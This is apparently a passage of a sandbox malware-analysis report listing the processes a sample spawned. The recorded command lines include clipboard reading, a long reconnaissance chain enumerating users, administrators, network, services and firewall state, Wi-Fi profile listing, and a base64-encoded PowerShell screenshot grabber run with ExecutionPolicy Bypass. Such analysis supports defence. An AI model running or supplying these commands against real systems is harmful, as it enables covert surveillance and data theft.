                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:powershell.exe Get-Clipboard
                                                                                                                                                                                                                                  Imagebase:0x7ff6cb6b0000
                                                                                                                                                                                                                                  File size:452'608 bytes
                                                                                                                                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:23
                                                                                                                                                                                                                                  Start time:09:08:40
                                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\chcp.com
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:chcp
                                                                                                                                                                                                                                  Imagebase:0x7ff7d9090000
                                                                                                                                                                                                                                  File size:14'848 bytes
                                                                                                                                                                                                                                  MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:24
                                                                                                                                                                                                                                  Start time:09:08:41
                                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\chcp.com
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:chcp
                                                                                                                                                                                                                                  Imagebase:0x7ff7d9090000
                                                                                                                                                                                                                                  File size:14'848 bytes
                                                                                                                                                                                                                                  MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:25
                                                                                                                                                                                                                                  Start time:09:08:41
                                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
                                                                                                                                                                                                                                  Imagebase:0x7ff7ef160000
                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:26
                                                                                                                                                                                                                                  Start time:09:08:41
                                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
                                                                                                                                                                                                                                  Imagebase:0x7ff7ef160000
                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:27
                                                                                                                                                                                                                                  Start time:09:08:41
                                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\systeminfo.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:systeminfo
                                                                                                                                                                                                                                  Imagebase:0x7ff6586f0000
                                                                                                                                                                                                                                  File size:110'080 bytes
                                                                                                                                                                                                                                  MD5 hash:EE309A9C61511E907D87B10EF226FDCD
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:28
                                                                                                                                                                                                                                  Start time:09:08:41
                                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\netsh.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:netsh wlan show profiles
                                                                                                                                                                                                                                  Imagebase:0x7ff7ec720000
                                                                                                                                                                                                                                  File size:96'768 bytes
                                                                                                                                                                                                                                  MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:29
                                                                                                                                                                                                                                  Start time:09:08:41
                                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                                                                                                  Imagebase:0x7ff605670000
                                                                                                                                                                                                                                  File size:496'640 bytes
                                                                                                                                                                                                                                  MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:30
                                                                                                                                                                                                                                  Start time:09:08:42
                                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\HOSTNAME.EXE
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:hostname
                                                                                                                                                                                                                                  Imagebase:0x7ff6ebeb0000
                                                                                                                                                                                                                                  File size:14'848 bytes
                                                                                                                                                                                                                                  MD5 hash:33AFAA43B84BDEAB12E02F9DBD2B2EE0
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:31
                                                                                                                                                                                                                                  Start time:09:08:42
                                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:wmic logicaldisk get caption,description,providername
                                                                                                                                                                                                                                  Imagebase:0x7ff6850e0000
                                                                                                                                                                                                                                  File size:576'000 bytes
                                                                                                                                                                                                                                  MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:32
                                                                                                                                                                                                                                  Start time:09:08:43
                                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\net.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:net user
                                                                                                                                                                                                                                  Imagebase:0x7ff66c150000
                                                                                                                                                                                                                                  File size:59'904 bytes
                                                                                                                                                                                                                                  MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:33
                                                                                                                                                                                                                                  Start time:09:08:43
                                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\net1.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\net1 user
                                                                                                                                                                                                                                  Imagebase:0x7ff6474d0000
                                                                                                                                                                                                                                  File size:183'808 bytes
                                                                                                                                                                                                                                  MD5 hash:55693DF2BB3CBE2899DFDDF18B4EB8C9
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:34
                                                                                                                                                                                                                                  Start time:09:08:44
                                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\query.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:query user
                                                                                                                                                                                                                                  Imagebase:0x7ff7dca70000
                                                                                                                                                                                                                                  File size:17'408 bytes
                                                                                                                                                                                                                                  MD5 hash:29043BC0B0F99EAFF36CAD35CBEE8D45
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:35
                                                                                                                                                                                                                                  Start time:09:08:45
                                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\quser.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:"C:\Windows\system32\quser.exe"
                                                                                                                                                                                                                                  Imagebase:0x7ff7cb260000
                                                                                                                                                                                                                                  File size:25'600 bytes
                                                                                                                                                                                                                                  MD5 hash:480868AEBA9C04CA04D641D5ED29937B
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:36
                                                                                                                                                                                                                                  Start time:09:08:45
                                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\net.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:net localgroup
                                                                                                                                                                                                                                  Imagebase:0x7ff66c150000
                                                                                                                                                                                                                                  File size:59'904 bytes
                                                                                                                                                                                                                                  MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:37
                                                                                                                                                                                                                                  Start time:09:08:45
                                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\net1.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\net1 localgroup
                                                                                                                                                                                                                                  Imagebase:0x7ff6474d0000
                                                                                                                                                                                                                                  File size:183'808 bytes
                                                                                                                                                                                                                                  MD5 hash:55693DF2BB3CBE2899DFDDF18B4EB8C9
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:38
                                                                                                                                                                                                                                  Start time:09:08:45
                                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\net.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:net localgroup administrators
                                                                                                                                                                                                                                  Imagebase:0x7ff66c150000
                                                                                                                                                                                                                                  File size:59'904 bytes
                                                                                                                                                                                                                                  MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:39
                                                                                                                                                                                                                                  Start time:09:08:45
                                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\net1.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\net1 localgroup administrators
                                                                                                                                                                                                                                  Imagebase:0x7ff6474d0000
                                                                                                                                                                                                                                  File size:183'808 bytes
                                                                                                                                                                                                                                  MD5 hash:55693DF2BB3CBE2899DFDDF18B4EB8C9
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:40
                                                                                                                                                                                                                                  Start time:09:08:45
                                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\net.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:net user guest
                                                                                                                                                                                                                                  Imagebase:0x7ff66c150000
                                                                                                                                                                                                                                  File size:59'904 bytes
                                                                                                                                                                                                                                  MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:41
                                                                                                                                                                                                                                  Start time:09:08:45
                                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\net1.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\net1 user guest
                                                                                                                                                                                                                                  Imagebase:0x7ff6474d0000
                                                                                                                                                                                                                                  File size:183'808 bytes
                                                                                                                                                                                                                                  MD5 hash:55693DF2BB3CBE2899DFDDF18B4EB8C9
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:42
                                                                                                                                                                                                                                  Start time:09:08:46
                                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\net.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:net user administrator
                                                                                                                                                                                                                                  Imagebase:0x7ff66c150000
                                                                                                                                                                                                                                  File size:59'904 bytes
                                                                                                                                                                                                                                  MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:43
                                                                                                                                                                                                                                  Start time:09:08:46
                                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\net1.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\net1 user administrator
                                                                                                                                                                                                                                  Imagebase:0x7ff6474d0000
                                                                                                                                                                                                                                  File size:183'808 bytes
                                                                                                                                                                                                                                  MD5 hash:55693DF2BB3CBE2899DFDDF18B4EB8C9
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:44
                                                                                                                                                                                                                                  Start time:09:08:46
                                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:wmic startup get caption,command
                                                                                                                                                                                                                                  Imagebase:0x7ff6850e0000
                                                                                                                                                                                                                                  File size:576'000 bytes
                                                                                                                                                                                                                                  MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:45
                                                                                                                                                                                                                                  Start time:09:08:47
                                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:tasklist /svc
                                                                                                                                                                                                                                  Imagebase:0x7ff759970000
                                                                                                                                                                                                                                  File size:106'496 bytes
                                                                                                                                                                                                                                  MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:46
                                                                                                                                                                                                                                  Start time:09:08:48
                                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\ipconfig.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:ipconfig /all
                                                                                                                                                                                                                                  Imagebase:0x7ff63c480000
                                                                                                                                                                                                                                  File size:35'840 bytes
                                                                                                                                                                                                                                  MD5 hash:62F170FB07FDBB79CEB7147101406EB8
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:47
                                                                                                                                                                                                                                  Start time:09:08:48
                                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\ROUTE.EXE
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:route print
                                                                                                                                                                                                                                  Imagebase:0x7ff632250000
                                                                                                                                                                                                                                  File size:24'576 bytes
                                                                                                                                                                                                                                  MD5 hash:3C97E63423E527BA8381E81CBA00B8CD
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:48
                                                                                                                                                                                                                                  Start time:09:08:49
                                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\ARP.EXE
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:arp -a
                                                                                                                                                                                                                                  Imagebase:0x7ff7fb0a0000
                                                                                                                                                                                                                                  File size:26'624 bytes
                                                                                                                                                                                                                                  MD5 hash:2AF1B2C042B83437A4BE82B19749FA98
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:49
                                                                                                                                                                                                                                  Start time:09:08:49
                                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\NETSTAT.EXE
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:netstat -ano
                                                                                                                                                                                                                                  Imagebase:0x7ff6cf460000
                                                                                                                                                                                                                                  File size:39'936 bytes
                                                                                                                                                                                                                                  MD5 hash:7FDDD6681EA81CE26E64452336F479E6
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:50
                                                                                                                                                                                                                                  Start time:09:08:49
                                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\sc.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:sc query type= service state= all
                                                                                                                                                                                                                                  Imagebase:0x7ff7d0b40000
                                                                                                                                                                                                                                  File size:72'192 bytes
                                                                                                                                                                                                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:51
                                                                                                                                                                                                                                  Start time:09:08:49
                                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\netsh.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:netsh firewall show state
                                                                                                                                                                                                                                  Imagebase:0x7ff7ec720000
                                                                                                                                                                                                                                  File size:96'768 bytes
                                                                                                                                                                                                                                  MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:52
                                                                                                                                                                                                                                  Start time:09:08:49
                                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\netsh.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:netsh firewall show config
                                                                                                                                                                                                                                  Imagebase:0x7ff7ec720000
                                                                                                                                                                                                                                  File size:96'768 bytes
                                                                                                                                                                                                                                  MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:53
                                                                                                                                                                                                                                  Start time:09:08:55
                                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                                                                                                                                                                  Imagebase:0x7ff7ef160000
                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:54
                                                                                                                                                                                                                                  Start time:09:08:55
                                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:wmic csproduct get uuid
                                                                                                                                                                                                                                  Imagebase:0x7ff6850e0000
                                                                                                                                                                                                                                  File size:576'000 bytes
                                                                                                                                                                                                                                  MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:55
                                                                                                                                                                                                                                  Start time:09:08:56
                                                                                                                                                                                                                                  Start date:18/12/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAVwBpAHQAaABQAGEAcgB0AGkAYQBsAE4AYQBtAGUAKAAiAFMAeQBzAHQAZQBtAC4ARAByAGEAdwBpAG4AZwAiACkADQAKAGYAdQBuAGMAdABpAG8AbgAgAHMAYwByAGUAZQBuAHMAaABvAHQAKABbAEQAcgBhAHcAaQBuAGcALgBSAGUAYwB0AGEAbgBnAGwAZQBdACQAYgBvAHUAbgBkAHMALAAgACQAcABhAHQAaAApACAAewANAAoAIAAgACAAJABiAG0AcAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAARAByAGEAdwBpAG4AZwAuAEIAaQB0AG0AYQBwACAAJABiAG8AdQBuAGQAcwAuAHcAaQBkAHQAaAAsACAAJABiAG8AdQBuAGQAcwAuAGgAZQBpAGcAaAB0AA0ACgAgACAAIAAkAGcAcgBhAHAAaABpAGMAcwAgAD0AIABbAEQAcgBhAHcAaQBuAGcALgBHAHIAYQBwAGgAaQBjAHMAXQA6ADoARgByAG8AbQBJAG0AYQBnAGUAKAAkAGIAbQBwACkADQAKAA0ACgAgACAAIAAkAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoACQAYgBvAHUAbgBkAHMALgBMAG8AYwBhAHQAaQBvAG4ALAAgAFsARAByAGEAdwBpAG4AZwAuAFAAbwBpAG4AdABdADoAOgBFAG0AcAB0AHkALAAgACQAYgBvAHUAbgBkAHMALgBzAGkAegBlACkADQAKAA0ACgAgACAAIAAkAGIAbQBwAC4AUwBhAHYAZQAoACQAcABhAHQAaAApAA0ACgANAAoAIAAgACAAJABnAHIAYQBwAGgAaQBjAHMALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAIAAgACAAJABiAG0AcAAuAEQAaQBzAHAAbwBzAGUAKAApAA0ACgB9AA0ACgANAAoAJABiAG8AdQBuAGQAcwAgAD0AIABbAEQAcgBhAHcAaQBuAGcALgBSAGUAYwB0AGEAbgBnAGwAZQBdADoAOgBGAHIAbwBtAEwAVABSAEIAKAAwACwAIAAwACwAIAAxADkAMgAwACwAIAAxADAAOAAwACkADQAKACQAcABhAHQAaAAgAD0AIAAoAEcAZQB0AC0ASQB0AGUAbQAgAC4AKQAuAEYAdQBsAGwATgBhAG0AZQArACIAXABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AcABuAGcAIgANAAoAcwBjAHIAZQBlAG4AcwBoAG8AdAAgACQAYgBvAHUAbgBkAHMAIAAkAHAAYQB0AGgA"
                                                                                                                                                                                                                                  Imagebase:0x7ff7ef160000
                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
